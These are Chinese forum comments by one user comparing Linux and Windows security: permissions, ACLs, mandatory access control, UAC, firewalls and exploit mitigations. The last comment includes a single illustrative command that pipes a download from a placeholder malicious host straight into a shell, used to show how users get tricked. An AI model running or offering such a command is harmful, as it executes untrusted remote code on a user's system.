• P
    pseudo_otaku

    @土豆不好吃 我毕竟是外行,刚刚说了那么多,逻辑确实很乱……
    mshtml等组件和系统耦合严重,确实是这样。
    但网页渲染引擎又不止MSHTML一个,嫌MSHTML不好,大不了可以不用……如果要举例,不知道各种“Chrome壳浏览器”算不算……
    至于漏洞,漏洞又不止IE有,哪家其实都有漏洞,PSV就是利用Webkit的漏洞作为攻击链的一环才破解掉的。
    公开的漏洞更容易被脚本小子利用,所以要及时更新才保证相对的安全。
    如果用户能保证按时给系统打补丁,那MSHTML是系统组件,它会跟着Windows Update一起更新打补丁,可能反倒比自己搞个Webkit更安全一些——当然,如果应用自己把更新搞好了,也不会比Windows Update差,可能还能避免Windows Update的一些蛋疼问题。

    我刚刚啰嗦那么多UAC之类的,不知道是不是有滑坡之嫌而不自知……
    我想说的大概是这么几点:
    1.安全机制有很多,比如Mandatory Access Control、容器技术等,Windows和Linux下都有实现,所以Windows在这方面至少不是缺失的。
    2.Linux相比Windows,可能更加灵活,赋予用户更多控制力。比如Windows防火墙,就我的使用感受来说,它远不如iptables灵活强大。(啊,WFP之类的东西好像被我吃掉了,现在补上……虽然我并不懂什么驱动开发,只会吹牛,哈哈)
    3.并不是所有用户都能充分利用系统提供的安全机制,无论Linux还是Windows都是这样。我在网上看到过不少“一关了事”的用户,他们无力掌控SELinux这些高级的安全机制,或者就算对它有一些了解,也忍受不了它带来的“麻烦”,最后就只能选择一关了事。Windows下对各种安全机制“一关了事”的人估计比Linux还多不少……

    再补充一点,Windows在历史上是个“单用户系统”,比起UNIX系早已润物细无声的权限系统,确实“吃亏”了,但现代的Windows和古董Win98早就不是一个概念了;至少,用rwx权限说Windows比Linux差劲,我是不认同的。

    还有缓冲溢出漏洞……对付漏洞,SELinux应该不是靠得最近的,它们只属于访问控制层面,还有ASLR、DEP、CFI等缓解措施,可以直接阻碍恶意代码执行。这方面好像grsecurity做得比较好,但grsecurity现在已经不提供免费的稳定版补丁了。

    一不小心又说了很多……感觉我说的这些大概是您早就烂熟于心的,而且我的表达还不怎么准确,可能用错了不少术语,贻笑大方。无论怎样,还是感谢您愿意花时间和我这个外行聊Linux和信息安全。

    发布在 土豆不好吃 阅读更多
  • P
    pseudo_otaku

    @土豆不好吃 SUID、SGID、Sticky真是把那几个bit能表示的意思榨干吃尽了。
    Windows有自己的组件管理系统,至少安装/卸载IE不是什么难事……毕竟有那么多组织需要自定义镜像、批量部署系统,应该不能让用户自己去“精简”吧。不过我也不清楚微软在这方面做得具体怎么样,好像连DaRT都是从Winternals公司买来的东西……
    安全方面,我可能也举不出太好的例子,也许还可以说说Windows的UAC和IE的保护模式。看上去,这俩机制好像蛮强大的,但微软还是宣称这俩不作为安全边界——随便你绕,我不会修的,顶多心情好了,发布新版本时顺带小补一下……那么SELinux、AppArmor策略又如何呢?策略制定者们肯定想做到不影响应用、服务正常运行,又点水不漏,但这似乎并不是件容易的事情。如果对系统做的限制太多又太粗暴的话,安全上有没有效果还不清楚,很多用户/系统管理员就先开始抱怨系统磕磕绊绊没法用了……

    发布在 土豆不好吃 阅读更多
  • P
    pseudo_otaku

    @土豆不好吃: 安全其实是一件很复杂的事情。比如禁止binary文件执行,Linux下和Windows下都可以实现,但就算禁了这个,我觉得还远远不能阻止恶意代码被执行,人家如果真的想执行代码,还可以尝试很多东西,除了尝试利用脚本解释器(当然,这个也可以被管制,最简单粗暴的就是直接禁止/卸载),能尝试的东西很多,比如劫持dll,或者注入进程等等……
    我觉得,想要安全,光靠系统的“优秀设计”可能是远远不够的,还是需要在这块有投入才行。

    发布在 土豆不好吃 阅读更多
  • P
    pseudo_otaku

    @土豆不好吃: 其实我只是个门外汉,随着性子就口胡了一些东西……我的评论很长,逻辑很乱,见谅。
    logcg说得一针见血,就是攻击面和成本的问题,不过作为外行,我可能还没资格说“赞同”……
    关于权限问题,Linux下的确可以设置umask,但umask只影响一个进程,虽然文件系统挂载参数也可以指定umask,但我觉得这种控制的“粒度”可能比较粗;Windows下,NTFS的权限是能设置继承的,比如,可以设置某目录下的所有文件全部拒绝执行、允许读取。但是,我没听说过有多少人这么设置NTFS的权限……要么是我信息闭塞(其实我只是个门外汉),要么就是大牛研究过,觉得设置这个意义不大吧……
    (谁说Linux没ACL的……Linux下也有ACL啊。不过我确实不知道ext4等文件系统里的ACL具体有多强大)
    SELinux/AppArmor等算是Mandatory access control吧,Windows下对应的可能是Mandatory Integrity Control?看上去好像不让SELinux那么灵活强大,但这块至少没有缺失吧。
    我还想啰嗦一句……Windows自带的防火墙有图形界面,看上去功能也很强大,不过实际用起来好像还是不如iptables那么灵活(可以加载插件,可以创建多个链多级跳转,过滤条件似乎也可以设置得更细)。我记得还有一个略坑爹的地方,就是Windows防火墙无视了loopback流量,不知道为啥会有这个设计……

    发布在 土豆不好吃 阅读更多
  • P
    pseudo_otaku

    我觉得在勒索面前,Linux和Windows本质上没太大区别,一个+x权限说明不了啥,NTFS不还自带ACL么……而且不+x也未必不能执行,可以直接把脚本内容喂给解释器啊……
    可能Windows用户实在太多,而且多数Windows用户看上去更愿意把电脑当作电视机、微波炉之类“电器”,没有打补丁的概念,也容易被骗双击;相比而言Linux用户是什么样子呢?可能有不少是IT相关专业的吧。就算是业余的,大多对电脑工作原理有好奇心,也读了不少科普,至少不太容易被骗双击(不过,我觉得就算不容易被骗双击了,也很有可能被骗wget http://malicious_source -O- | sh啊……),说不定有些用户看到Hacking Team被黑的新闻,就会想方设法把Flash禁了,但Windows用户有不少可能压根没这个意识。
    Windows还有一个特点,就是系统装好就自带一大堆服务(而且这些服务可能还真是不太安全,有人吐槽过,SMB已经爆炸过N次了,而且动不动就是全版本通杀),用户一时半会还很难整明白这些服务是干啥的,不敢随便禁用。抛开服务该不该开、是否容易爆洞的问题,按理说,系统自带的防火墙也能挡住攻击吧?但有不少用户可能连TCP、UDP是个啥都不知道,肯定也不能指望他们配置好防火墙。Linux看上去就不会随手给用户开SMB等整不明白的服务,而且Linux用户至少对网络有点常识,所以,Windows用户貌似就比Linux用户“吃亏”了。
    实际上,我觉得还是用户投入的精力和资源太少才导致安全出现问题。只要投入足够的精力,Linux和Windows都是很安全的,如果投入精力和资源不足,那Linux和Windows都不安全。

    发布在 土豆不好吃 阅读更多

与 V2MM 的连接断开,我们正在尝试重连,请耐心等待